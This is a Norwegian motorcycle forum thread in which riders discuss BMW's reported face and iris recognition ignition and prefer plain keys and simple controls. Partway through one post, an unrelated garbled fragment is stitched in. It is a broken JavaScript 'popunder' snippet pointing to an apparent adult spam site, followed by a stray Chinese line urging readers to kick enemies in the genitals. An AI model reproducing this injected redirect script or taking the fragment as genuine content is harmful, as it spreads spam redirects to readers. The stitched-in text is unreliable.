BMW iFace ..,

Generelt om MC, nyheter, hendelser, film & bilder, MC i media, kjøreopplæring osv.
Svar
Brukeravatar
dypen
Innlegg: 5290
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

BMW iFace ..,

Legg inn av dypen »

Ser BMW har kommet med infrarød ansikt og øyegjenkjenning som erstatter tenningsnøkkel som fungerer i mørke og med hjelmen på. Systemet fungerer for det er både ansiktskanning og iris hornhinneskanning som funker med hjelmen på og med infrarød funker det i mørket også. Hvis sykkel’n er fornøyd med det den ser frigjøres tenningslås styrelås ja alle låser og sykkel kan startes. Er det noen her inne som har ny BMW med iFace …
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Brukeravatar
Gammelsmurfen
Innlegg: 1297
Registrert: 09 nov 2020, 19:05
Motorsykkelen din: BMW F850GS Rally 2022

Re: BMW iFace ..,

Legg inn av Gammelsmurfen »

Altså, jeg jobber med teknologi og er absolutt åpen for nye løsninger.
Men... mine erfaringer med biometriske løsninger er generelt ganske dårlige.
Småkranglete og ustabilt, må alt for ofte ha flere forsøk etc., da blir jeg bare irritert.
Nei, gi meg heller en nøkkel eller "keyless", bruker ikke noe lenger tid på å starte kjøretøyet uansett.

mekkern
Innlegg: 7590
Registrert: 06 nov 2008, 22:42
Motorsykkelen din: flere -til div kjøring.
Sted: Tranby

Re: BMW iFace ..,

Legg inn av mekkern »

Ville nok ikke satset på scanning som eneste måte for å komme hjem....ref rema1000 reklamen.

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
当有疑问时踢你的敌人在生殖器上,你可以道歉后

Brukeravatar
AJ
Administrator
Innlegg: 37879
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: BMW iFace ..,

Legg inn av AJ »

Gammelsmurfen skrev: 20 okt 2023, 19:40 Altså, jeg jobber med teknologi og er absolutt åpen for nye løsninger.
Men... mine erfaringer med biometriske løsninger er generelt ganske dårlige.
Småkranglete og ustabilt, må alt for ofte ha flere forsøk etc., da blir jeg bare irritert.
Nei, gi meg heller en nøkkel eller "keyless", bruker ikke noe lenger tid på å starte kjøretøyet uansett.
For egen del må jeg si jeg får mer og mer sansen for slik det var i "gamledager", med bryter og knapper hvor man vet hvor er uten å måtte lete etter knapper å trykke på en skjerm, eller bla gjennom en omfattende meny.
Samme med tenningsnøkkel etter å ha opplevd nøkkelløssystem problemer. Selv om jeg også har opplevd at en tenningsnøkkel har knekt tvers av i tenningslåsen under kjøring ved omtrent maks styreutslag. Pga. egen dumhet ved at jeg hadde hengt på en del "dingel-dangel" på knippet :doh :-)å ...

Jeg har jo gått så langt når det gjelder dette at jeg kjøpte en fabrikkny motorsykkel i år som er fullt ut luftavkjølt, altså uten oljekjøingsregister (radiator), vanlig tenningsnøkkel som også brukes til å låse opp bensintanklokket, som for øvrig ikke er hengslet. Må altså skrus av og fjernes.
Ingen bensinmåler, kun en lampe som lyser nå tanknivået synker til et visst nivå. Heller ingen oljetrykksmåler eller oljetemp.måler pg flere kjøremoduser og stort TFT instrumentpanel med allverdens innretninger og ovderflodsinformasjon man kanskje strengt tatt ikke trenger, men blir pådyttet av MC-produsenten som åpenbart svært gjerne vil vise hva de kan putte inn i teknologien...
Så... kan det blir for mye :scratch ?

Og med denne "enkle" italienske motorsykkelen jeg kjøpte i år har jeg knapt hatt det morsommere i MC-salen enn med denne. Skriver "enkle" nettopp slik fordi bla. motoren i denne likevel er ganske avansert siden den fint greier å holde seg innafor gjeldende utslippskrav.
I tillegg lavt drivstofforbruk.

Så... det enkle er kanskje ofte det beste?
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Svar